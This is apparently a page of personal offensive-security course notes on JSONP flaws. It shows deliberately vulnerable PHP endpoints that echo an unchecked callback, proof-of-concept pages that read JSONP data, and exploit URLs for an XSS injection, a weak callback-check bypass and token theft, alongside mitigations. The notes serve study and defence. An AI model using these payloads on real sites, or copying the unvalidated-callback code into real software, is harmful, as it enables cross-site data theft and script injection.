0Sec
0Sec
0Sec
  • Spider Security
  • offensive security
    • OSCP
      • WriteUps
        • PortSwigger
          • SQL injection labs
          • Exploiting XXE to retrieve data by repurposing a local DTD
        • PentesterLabs
          • Recon
        • HTB
          • BoardLight
          • Lame
        • THM
          • Walkthroughs
            • Attacktive Directory
            • LineKernel
            • Day 1 — Linux PrivEsc
          • CTF
            • Page
            • BLUE
            • mKingdom
            • RazorBlack
      • Module 1 (General Info)
      • Module 2 (Getting Kali)
        • Leason 1 - Booting Up Kali Linux
        • Leason 2 - The Kali Menu
        • Leason 4 - Finding Your Way Around Kali
        • Leason 5 - Managing Kali Linux Services
      • Module 3 (CLI)
        • The Bash Environment
        • Piping and Redirection
        • Text Searching and Manipulation
          • Regular
        • Managing Processes
        • File and Command Monitoring
      • Module 4 (Practical Tools)
        • Netcat
        • Socat
        • PowerShell & Powercat
        • Wireshark
        • Tcpdump
      • Module 5 (Bash Script)
      • Module 6 (Passive Info Gathering)
      • Module 7 ( Active Info Gathering)
      • Module 8 (Vulnerability Scanning)
      • Module 9 (Web Application Attacks)
        • Cross Site Scripting (XSS)
        • local file inclusion & remote file inclusion
          • Exploit LFI
        • SQL injection
          • Blind Boolean based SQL & Evasion Techniques
          • SQL
          • Login bypass List
        • File upload
        • Remote code execution
      • Module 10 ( Intro Buffer OverFlow)
      • Module 11 (Widows Buffer OverFlow)
        • Buffer OverFlow Challange
      • Module 12 (Linux Buffer OverFlows)
      • Module 13 (Clint Side Attacks)
      • Module 14 (Locating Public Exploits)
      • Module 15 (FIxing Exploits)
      • Module 16 (File Transfers)
      • Module 17 (Antivirus Evasion)
        • Windows
      • Module 18 (Privllege Escalation)
        • Windows
          • Checklist
          • THM - Windows PrivEsc Arena
        • Linux
          • Checklist
          • Linux PrivEsc Arena
      • Module 19 (Password Attacks)
      • Module 20 (Port Redirection and Tunneling)
      • Module 21 (Active Directory Attacks)
        • adbasics_v1.2
      • Module 22 (Metasploit Framwork)
      • Module 23 (Powershell Empire)
      • Course Materials
  • SANS
  • AppSec
    • EWAPTX
      • PHP Type Juggling
      • CSP
      • SqlI
        • Information_schema
        • WriteUps
      • SSTI & CSTI
      • XSS_HTML Injection
      • CORS Attack
      • Clickjacking
      • Open redirect
      • JSONP
      • LFI && LFD && RFI
      • HTTP Host header attacks
      • CSRF
      • XML injection
      • XML external entity (XXE) injection
      • APIs & JWT attacks
      • Insecure Deserialization
      • OAUTH 2.0 authentication vulnerabilities
      • Host Header Injection
      • Insecure Direct Object References (IDOR)
  • Reverse Eng & Malware dev
    • Internals
      • Windows internals
        • Topics in GitHub
        • Chapter 1 Concepts and tools
        • Chapter 2. System architecture
        • Chapter 3. Processes and jobs
        • Chapter 4. Threads
        • Chapter 5. Memory management
        • Chapter 6. I/O system
        • Chapter 7. Security
      • Linux internals ⇒ Soon
      • MacOs X internals ⇒ Soon
  • cheat sheet
    • Pentest_Notes
    • Linux BOF & Wireless Attacks
    • WriteUps
Powered by GitBook
On this page
  1. AppSec
  2. EWAPTX

JSONP

Code Vulnerable

<?php
session_start();

if($_SESSION['islogin'] != 1){
    header("Location: login.php");
    die();
}

?>
<html>
  <head>
    <title>Books Library</title>
    <link rel="stylesheet" type="text/css" href="../style/css.css">
  </head>
  <body id="bodyId">
    <div class="header">
      <a href="index.php" class="logo">Books Library</a>
      <div class="header-right">
        <a href="index.php">Home</a>
        <a class="active" href="profile.php">Profile</a>
        <a href="login.php">Login</a>
      </div>
    </div>
    <div id=output>
    	
    </div>
    <div class="container">
    	**<script type="text/javascript">
    		function userInfo(data){
    			var name = '<center><span>User Name: '+data["username"]+'</span><br>',
    				email = '<span>Email: '+data['email']+'</span><br>',
    				fname = '<span>Full Name: '+data['Full Name']+'</span></center>';
    			document.getElementById('output').innerHTML = name+email+fname;
    		}
    	</script>**
    	<script src="<http://vuln.labs/labs/jsonp/info.php?callback=userInfo>"></script>
    </div>
  </body>
</html>

POC

**<script>
	function userInfo(data){
		document.write(JSON.stringify(data))
	}
</script>
<script src='<http://localhost/labs/jsonp/info.php?callback=userInfo>'></script>**

Mitigation

Use CORS Instead of JSONP

Strict Callback Validation

<?php
header('Content-Type: application/javascript');

**$allowed_callbacks = ['safeFunction'];**
$callback = $_GET['callback'];

if (in_array($callback, $allowed_callbacks)) {
    $data = [
        "name" => "John Doe",
        "email" => "john@example.com"
    ];

    echo $callback . '(' . json_encode($data) . ');';
} else {
    echo 'console.error("Invalid callback function.");';
}

JSONP Content-Type Validation

More Complex

Scenario 1: Exploiting with Malicious Parameters

<?php
header('Content-Type: application/javascript');

$callback = $_GET['callback'];
$name = isset($_GET['name']) ? $_GET['name'] : 'John Doe';
$email = isset($_GET['email']) ? $_GET['email'] : 'john@example.com';

$data = [
    "name" => $name,
    "email" => $email
];

// Vulnerable JSONP response with user input
echo $callback . '(' . json_encode($data) . ');';

exploit

<http://localhost/vulnerable_server.php?callback=stealData&name=><script>alert('XSS')</script>&email=attacker@example.com

get XSS and JSONP data

Scenario 2: Bypassing Weak Validation

<?php
header('Content-Type: application/javascript');

$callback = $_GET['callback'];
$allowed_callbacks = ['safeFunction'];

if (strpos($callback, 'safe') === 0) {
    $data = [
        "name" => "John Doe",
        "email" => "john@example.com"
    ];

    echo $callback . '(' . json_encode($data) . ');';
} else {
    echo 'console.error("Invalid callback function.");';
}

Exploit

<http://vulnerable.com/vulnerable_server.php?callback=safeStealData>

Scenario 4: JSONP Hijacking via CORS Misconfiguration

CORS-Enabled

<?php
header('Access-Control-Allow-Origin: *'); // Wide open CORS policy
header('Content-Type: application/javascript');

$callback = $_GET['callback'];
$data = [
    "token" => "58rec269qs4a9w8ewd2a6ghy6", // Sensitive data
];

echo $callback . '(' . json_encode($data) . ');';

Exploit

<script>
function safeStealData(data) {
    console.log("Stolen token:", data.token);
    // Further actions like sending the token to the attacker's server
}
</script>
<script src="<http://localhost/labs/jsonp/plus/vuln_server3.php?callback=safeStealData>"></script>

Scenario 5: Advanced URL Manipulation

<?php
header('Content-Type: application/javascript');

$callback = **urldecode**($_GET['callback']);
$data = [
    "name" => "John Doe",
    "email" => "john@example.com"
];

echo $callback . '(' . json_encode($data) . ');';
PreviousOpen redirectNextLFI && LFD && RFI

Last updated 9 months ago